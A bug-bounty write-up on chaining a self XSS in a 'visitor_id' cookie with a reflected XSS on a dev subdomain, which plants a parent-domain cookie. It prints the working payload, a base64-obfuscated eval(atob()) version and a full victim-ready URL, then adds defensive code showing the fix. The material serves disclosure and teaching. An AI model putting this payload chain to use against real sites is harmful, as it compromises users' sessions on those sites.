From Unexploited XSS to Self Stored XSS on Victim Cookies
Hello Friends
Jan 17, 2021
Day#1
This is part 2 of this story. I will talk about a self XSS on cookies and how I exploited it through an out-of-scope subdomain.
So our target is redact.com. First, how did I find the vulnerable cookie attribute? After browsing redact.com I stopped at the path www.redacted.com/redactedfolder/redactedpage/ID and used Param Miner (brute force) to look for hidden parameters. I found two, but unfortunately both were filtered, so I turned to guessing cookie parameters.
Finally I found an attribute named visitor_id whose value was injected into the page's JavaScript source.
Now I have a self XSS, and it is out of scope. But a subdomain can set a cookie for the parent domain, so I will exploit it through an out-of-scope subdomain.
Day#2
I extracted subdomains, and after one or two hours I found a reflected XSS on a subdomain, http://dev-labs.redact.com/login?username=[Here]. So we will set the cookie from the subdomain for the main domain. [Hope you understand the exploitation; if not, please watch the video.]
Our exploit:
document.cookie='visitor_id=w0</script><svg/onload=alert(document.domain)>; domain=.redact.com; path=/;' ;document.location="https://www.redact.com/redactfolder/redactpage/1337"
Let's encode it:
</script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>
So now we have a valid PoC; we send the URL to the victim:
http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>
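As an added illustration (not code from the original post or the target site), the following JavaScript models the visitor_id bug described above: the vulnerable renderer copies the cookie value straight into an inline script, so a planted value containing `</script>` breaks out of the script block, while the hardened renderer allow-lists the value and emits it as an escaped JS literal. The function names, the page template and the sample cookie are assumptions for illustration.

```javascript
// Added illustration, not the original post's code. Models a server that
// copies the "visitor_id" cookie into an inline <script> block.

function parseCookies(header) {
  // Minimal Cookie header parser: "a=1; b=2" -> { a: "1", b: "2" }
  const out = {};
  for (const part of header.split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    out[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return out;
}

// Vulnerable pattern (the bug the post describes): raw concatenation of an
// attacker-controllable cookie value into JavaScript source.
function renderPageVulnerable(cookieHeader) {
  const visitorId = parseCookies(cookieHeader).visitor_id || "";
  return "<script>var visitorId = '" + visitorId + "';</script>";
}

// Hardened pattern: allow-list the expected identifier format, then emit the
// value as a JSON literal with "<" and ">" escaped so no embedded
// "</script>" can terminate the block (JSON.stringify alone does not do this).
const VISITOR_ID_RE = /^[A-Za-z0-9_-]{1,64}$/;

function toJsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e");
}

function renderPageHardened(cookieHeader) {
  const raw = parseCookies(cookieHeader).visitor_id || "";
  // Anything outside the expected shape is dropped rather than rendered.
  const visitorId = VISITOR_ID_RE.test(raw) ? raw : "";
  return "<script>var visitorId = " + toJsLiteral(visitorId) + ";</script>";
}

// Constructed sample: the cookie shape the post's payload plants on .redact.com
const TOSSED_COOKIE = "visitor_id=w0</script><svg/onload=alert(document.domain)>";
```

Because any subdomain can set a `Domain=.redact.com` cookie, the application must treat cookie values as untrusted input just like query parameters; a cookie named with the `__Host-` prefix cannot carry a Domain attribute, so a subdomain cannot plant one that the parent host will read.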